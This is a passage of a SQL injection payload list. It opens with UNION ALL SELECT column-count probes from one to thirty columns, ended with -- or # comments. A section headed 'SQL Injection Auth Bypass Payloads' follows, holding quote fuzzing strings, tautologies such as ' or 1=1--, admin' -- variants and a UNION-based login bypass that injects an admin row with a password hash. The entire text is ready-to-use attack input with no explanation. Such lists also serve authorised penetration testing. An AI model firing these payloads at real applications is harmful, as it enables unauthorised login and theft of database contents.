 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#

SQL Injection Auth Bypass Payloads

'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055